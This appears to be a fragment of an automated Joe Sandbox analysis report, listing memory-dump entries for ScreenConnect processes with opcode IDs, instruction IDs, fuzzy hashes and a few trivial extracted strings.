                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c3728290985ac86b1d16096baba373f9e8fe76d6461bb4c768218f7745ef633a
                                                                                                                                                                                                  • Instruction ID: 03cb80c96f0a8a131be351eb973e72d0ac3153b995d388fd035c3db7d8148586
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3728290985ac86b1d16096baba373f9e8fe76d6461bb4c768218f7745ef633a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E092317083149BD7186AB9749D57F7BFAEBC8725354813DE50AC7340CE714C4A8760
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 99f3c6f2687a05a6fd50def41c4730748e5848b2ef65976f8837429000ffbac6
                                                                                                                                                                                                  • Instruction ID: f35e479684831a64ec98f87123ab093b712c2724b129a96ddc58f9fb7e46f478
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99f3c6f2687a05a6fd50def41c4730748e5848b2ef65976f8837429000ffbac6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F0ED31300B089BC312976EE80499F339AEBC8A50310802DEC1ACB300EF31EC468BD0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3701b64a0dfe3e0c039bec036ae34bb1ecc9d26fa8d99e5e969ea8da3498e763
                                                                                                                                                                                                  • Instruction ID: 8fdfd431224787bf7fe444521442b157dc93eb90f3c15876572e2b61a30e3f1e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3701b64a0dfe3e0c039bec036ae34bb1ecc9d26fa8d99e5e969ea8da3498e763
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06E04F31708314A787186AAAB48C52BBAEAEBCCA65754413DE60EC3344DE718C4943A4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 75c86bafc6a5e3e655bb8fc5f3bdde79066e49813f3400a91bdf3e4b360d0c89
                                                                                                                                                                                                  • Instruction ID: 8eeace18a9338d8bed2e720b7bbdccfb7e22daac69996ef0a14abc0283cd57e3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75c86bafc6a5e3e655bb8fc5f3bdde79066e49813f3400a91bdf3e4b360d0c89
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5E09231A00390CFC7266B70B01D5AABFF1EF8A22131980AADC4A87216CB35CC42CF41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 08c267a4b25d67627058169b9ff195f2befd9e2eb82b7c0e076f04505feb3be3
                                                                                                                                                                                                  • Instruction ID: f3e8551c451addf21b0eeebd641cc2789f6b9d8fa6d7ff539706c1ec5dcfca48
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08c267a4b25d67627058169b9ff195f2befd9e2eb82b7c0e076f04505feb3be3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41E0D87050A389DFCB01DB74ED925EC7FB1DF4A20071581D9D44DD7212D6311E1ADB51
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f2f9504a34ef096e24c72ae1660bd854a990cc9099d964ee6934da87c45e3b76
                                                                                                                                                                                                  • Instruction ID: 2f3692ac34c96b697299d77dff45062698b85aae1c5ce340b0a0472c1182e601
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2f9504a34ef096e24c72ae1660bd854a990cc9099d964ee6934da87c45e3b76
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46E09A30A05389EFCB01DBB8E8565EE7FF4EF8621071184EAC888DB212DA341E42DB01
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 64aedfb4a378800b2ac164f829b3d57532dd1ae737bd5e1435c0cd9826ce7d3f
                                                                                                                                                                                                  • Instruction ID: ce25c00b8c09ec7f379579b7891a316e59055f520f1f85aa4889352e153b1354
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64aedfb4a378800b2ac164f829b3d57532dd1ae737bd5e1435c0cd9826ce7d3f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8E04F70D542099FCB80DF7885525ADBFF0EF49200B15C2FAC85DD7202D33285038B81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9107eef7e7d1d2f5f10f30723f82cfbf301a35f76164c14dcc7f238d628e1d20
                                                                                                                                                                                                  • Instruction ID: f4ea95a081971c31be8768ee002e225914745facf32eb28965362fcf10a523a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9107eef7e7d1d2f5f10f30723f82cfbf301a35f76164c14dcc7f238d628e1d20
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82E0D8311087D14FD316D73CF4111E87FE1AF8A2147094ADED0C58B152CA70AC4B8396
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 60ad814dfd25f526bd9a5ecab08638c3851b459a16f5c623e16b5b553222d9d0
                                                                                                                                                                                                  • Instruction ID: 9c9a7d8d110b9a9f1896ee2807127ed08a4f4d50a22bcb3a22b1206a8094de39
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60ad814dfd25f526bd9a5ecab08638c3851b459a16f5c623e16b5b553222d9d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4E01222B0E2D45FD71357B8A8A15F97F79DD8715530840D3D485CB052CA14161A9366
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4970f14fc7632ba11910b7f7004c9b752deaefec6231fd1c2e71ce6d5c15238c
                                                                                                                                                                                                  • Instruction ID: a6ee09a297fd43ab7c5cf0f168b691287496db4a119113bac7a6873926045b41
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4970f14fc7632ba11910b7f7004c9b752deaefec6231fd1c2e71ce6d5c15238c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E08C3A3002149B8318AA7DF41C46F7AAAEBCD271315812AF50AC3388CF309C5287A1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2595f8cc819cb3a9339b184714edf81bc152dc9effcf4656759799ba5f434d0e
                                                                                                                                                                                                  • Instruction ID: 98ceafe15790e2a11ca23317ea12b05986daa84773b9dbd1c5fa48d92c8686f0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2595f8cc819cb3a9339b184714edf81bc152dc9effcf4656759799ba5f434d0e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0E0267040C2C00FC3028778E89D0C57FE0EF43224B9848CAD9C08B507E2215447C782
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 46bb88ea9e6ceab642e7adca2180835f02274b02883a69a7dd820a761f3de08c
                                                                                                                                                                                                  • Instruction ID: 5a702628393e6fe33cfb33a51437d2ef2760b606cd589b329f4875cd3c9e1160
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46bb88ea9e6ceab642e7adca2180835f02274b02883a69a7dd820a761f3de08c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECE0262001C3C01FC302973498862D53FF4DF07224F4848D9D8C18E543C526A85BCBA3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0d9903c58417d0346320b18507599b611752f40eef42bd054d02abb29aab93c0
                                                                                                                                                                                                  • Instruction ID: 36436ecaebbe4ded560b33275ea91d06e0a12a20e4fcfa0dea1a354b8b1cc28c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d9903c58417d0346320b18507599b611752f40eef42bd054d02abb29aab93c0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2ED05E70A0130CFFCB00DFA8F90459EB7B9EB45200B1041A8D808D3200EA316F549B81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 772878430d6348586007895f51f585dec80f2af6fe3a103e0b4b116529d40605
                                                                                                                                                                                                  • Instruction ID: 9ea12b87cf6271b6ce0bf1fc8bb4d9149aef075194afc73dc245dde9979ccc89
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 772878430d6348586007895f51f585dec80f2af6fe3a103e0b4b116529d40605
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81D05EB0A0130DEFCB40EFB4ED0065DB7B9EB4C200B1081A9D80CE3200EB316F149B91
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t*Jt$t*Jt
                                                                                                                                                                                                  • API String ID: 0-3942707866
                                                                                                                                                                                                  • Opcode ID: b6548db560363f3c41baecb940bc1c71f16bf0508528b20b28466ddb571706e0
                                                                                                                                                                                                  • Instruction ID: 09f9756ee25574fcbf74629e8fac3306e8599fd05ce10fb7e298d40a9f8b699d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6548db560363f3c41baecb940bc1c71f16bf0508528b20b28466ddb571706e0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F11C471F0020DAFEB55CA69CC00AABB7F6BFC4704F14C465D528E7295E7719A41CB90
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                  • Opcode ID: d1956814eea4d8b6b850b039470a260d3a47ae2927232ef84f74eecb7a4a35c2
                                                                                                                                                                                                  • Instruction ID: 3ffa4d51da6555415b6874def23347d16524db5da972824d8cdf9f9514e142de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1956814eea4d8b6b850b039470a260d3a47ae2927232ef84f74eecb7a4a35c2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAD17F74A40709CFCB95DF68C884A99B7B2FF49310B118659EA19AB365DB30ED85CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                  • Opcode ID: a18cfa2abf13738a571d1491c3d4c18d0939d71874bad5a4758ce963089dd8ca
                                                                                                                                                                                                  • Instruction ID: 3ff45eeff667fd7e6bc101524169db10262010f3cc9e0ebcc80a093d6a0a8c56
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a18cfa2abf13738a571d1491c3d4c18d0939d71874bad5a4758ce963089dd8ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D51E330A00219CFDB6A9B68D864B6EBBF2BF84711F14C969D856DB2D1DB309D44C790
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                                                                  • Opcode ID: 5382c37ac3362e23916d47e88610fe71b5d1576b2cf2a6af5de43d6445f8184b
                                                                                                                                                                                                  • Instruction ID: 11712deef64877749054abf1fbf01e051cdf46fc01f34c53c811ed539056f951
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5382c37ac3362e23916d47e88610fe71b5d1576b2cf2a6af5de43d6445f8184b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8031CF30B0031A9BCB96EB69D85466FB3E2FFC92107108629D919DB344EF70ED058BD5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                                                                  • Opcode ID: 090442ab38034a4481c98fd99120d2f471ade52fb43b7549a0e31c244d771af6
                                                                                                                                                                                                  • Instruction ID: 48875d151ecab23f22f4b42b9652a9c2c3221d3f600e445552a05cccf2cb1c6f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 090442ab38034a4481c98fd99120d2f471ade52fb43b7549a0e31c244d771af6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4831C131B0031A9B8B96EB79D85456FB3E6FFC92103108629D909DB344EF70ED058BD5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t*Jt
                                                                                                                                                                                                  • API String ID: 0-2906470731
                                                                                                                                                                                                  • Opcode ID: 3b5057c12a63324c60c5df0f969966fecc5336b5a5b03ea10719015e37a4218a
                                                                                                                                                                                                  • Instruction ID: 973ee46eebbe7f6a980818a5e08df3a7231cf9431f1ef855cb0dd10b49c64bbb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b5057c12a63324c60c5df0f969966fecc5336b5a5b03ea10719015e37a4218a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F11C271E00209EFDB26DA59CC40BABB7B5EFC5704F04C465D528D7185E7319A01CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3ddfbdb98fab265cec27216569ede92810198a2416272cfd4512324032aea4e7
                                                                                                                                                                                                  • Instruction ID: 3bdc0f892e4e98c27ad3562193ff764de266e9a4be351cb33d72af276b33a4eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ddfbdb98fab265cec27216569ede92810198a2416272cfd4512324032aea4e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AA17370E0030DCFDB55EFA9C894AADBBB2FF85310F108699D505AB395DB749A85CB80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e7adfa5be85d9eaa47cadc328fecd128d6c3f54308c3856e50abeffd8b2b48e9
                                                                                                                                                                                                  • Instruction ID: 963d5b23991b5fe19da46240c88a9be4511701cc7dfcdc65a1a3006e3685d156
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7adfa5be85d9eaa47cadc328fecd128d6c3f54308c3856e50abeffd8b2b48e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AA12A74B006098FDB55DFA9C994AAEB7F2EF89310B148258E405EB3A5DB34ED01CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e8548881386ff1af0031815c7e731bc5c27f7f044698ae37c865302bc1251ed6
                                                                                                                                                                                                  • Instruction ID: ab419275925079dc63613e1cf902066bbb91f6c0670f28008d710ecbdf51d020
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8548881386ff1af0031815c7e731bc5c27f7f044698ae37c865302bc1251ed6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6A10974B006098FDB55DFA9C994AAEB7F2EF89310B148658E406EB3A5DB31ED01CF50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 70f1c02ac1ea335310f02d146cd931db9f7d95e3f81ca48b5ea229187088fa89
                                                                                                                                                                                                  • Instruction ID: 378f62f121c964552ad0b5af81796feffbfb3fb80d76fe12467c540dd4e4514a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70f1c02ac1ea335310f02d146cd931db9f7d95e3f81ca48b5ea229187088fa89
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91619231F002198BEB56EBB9C8507AEBAB6AFC9740F148129D505B7384DF749D42C791
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ed381a847f2137ba02a6e477515e7f348c8b5acf14715d04fa7cace444428012
                                                                                                                                                                                                  • Instruction ID: 70a0af9dc0a9f17d336f3e027a12e5fb1c01f67b1117d272c45271d54989af24
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed381a847f2137ba02a6e477515e7f348c8b5acf14715d04fa7cace444428012
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC61F634B106098FEB15DF68D894A6EB7B6FF8E714B108168E506EB365DB30ED41CB80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 621e3a9815a4914445b80f406bf826693e8cc63e99c4973c65bf4b453e9727df
                                                                                                                                                                                                  • Instruction ID: d7ff8f066c74eaf33e73373f840c4fe65c922e49c63b339f09ba26ef7612571d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 621e3a9815a4914445b80f406bf826693e8cc63e99c4973c65bf4b453e9727df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD51C570704209CFDB96EB38C85866E7BE2AF88710B148468D506CB3A5EF74DD42CFA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 8d76ac8ebefe1a6b36f24f5fc7372dc6115e3678cbaf75b8ef98ec5e6ced54a6
                                                                                                                                                                                                  • Instruction ID: 8bf745cd1ef22c35945fdf76ff6e7502c879c123004dba916b290b712edba057
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d76ac8ebefe1a6b36f24f5fc7372dc6115e3678cbaf75b8ef98ec5e6ced54a6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51518C7470070A8FDB55DFA9C894A6BB3EAEFCD3007148968E546CB365EB30ED058B90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 166745e7bd9c66ccf8a39fabe7ae4a4466a3d2b7e2fb97d67cb8fa0922e2c9eb
                                                                                                                                                                                                  • Instruction ID: 1ae77f1450ac61a467fb31b03a106aa45360c376fd14604080d0d78add694a2d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 166745e7bd9c66ccf8a39fabe7ae4a4466a3d2b7e2fb97d67cb8fa0922e2c9eb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1751923070020A8FDB95EB79D95466E77E2AF88750B10846CD506DB3A5EF74DD018FA1
                                                                                                                                                                                                  Memory Dump Source
